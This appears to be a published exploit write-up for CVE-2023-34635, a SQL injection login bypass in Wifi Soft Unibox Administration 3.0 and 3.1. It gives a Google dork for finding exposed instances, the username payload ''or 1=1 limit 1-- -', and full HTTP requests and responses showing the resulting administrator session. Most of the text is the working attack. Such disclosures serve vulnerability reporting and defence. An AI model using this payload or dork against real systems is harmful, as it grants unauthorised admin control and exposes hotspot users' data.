Wifi Soft Unibox Administration 3.0 & 3.1 - SQL Injection

# Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection
# Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0"
# Date: 07/2023
# Exploit Author: Ansh Jain @sudoark
# Author  Contact : [email protected]
# Vendor Homepage: https://www.wifi-soft.com/
# Software Link:
https://www.wifi-soft.com/products/unibox-hotspot-controller.php
# Version: Unibox Administration 3.0 & 3.1
# Tested on: Microsoft Windows 11
# CVE : CVE-2023-34635
# CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635

The Wifi Soft Unibox Administration 3.0 and 3.1 Login Page is vulnerable to
SQL Injection, which can lead to unauthorised admin access for attackers.
The vulnerability occurs because of not validating or sanitising the user
input in the username field of the login page and directly sending the
input to the backend server and database.

## How to Reproduce
Step 1 : Visit the login page and check the version, whether it is 3.0,
3.1, or not.
Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field and
enter any random password.
Step 3 : Fill in the captcha and hit login. After hitting login, you have
been successfully logged in as an administrator and can see anyone's user
data, modify data, revoke access, etc.


--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Login Request
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

-----------------------------------------------------------------------------------------------------------------------
Parameters: username, password, captcha, action
-----------------------------------------------------------------------------------------------------------------------

POST /index.php HTTP/2
Host: 255.255.255.255.host.com
Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Origin: https://255.255.255.255.host.com
Referer: https://255.255.255.255.host.com/index.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

username='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Login Response
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

HTTP/2 302 Found
Server: nginx
Date: Tue, 18 Jul 2023 13:32:14 GMT
Content-Type: text/html; charset=UTF-8
Location: ./dashboard/dashboard
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Successful Loggedin Request
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

GET /dashboard/dashboard HTTP/2
Host: 255.255.255.255.host.com
Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://255.255.255.255.host.com/index.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Successful Loggedin Response
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

HTTP/2 200 OK
Server: nginx
Date: Tue, 18 Jul 2023 13:32:43 GMT
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache_control: private


<!DOCTYPE html>
<html lang="en">
html content
</html>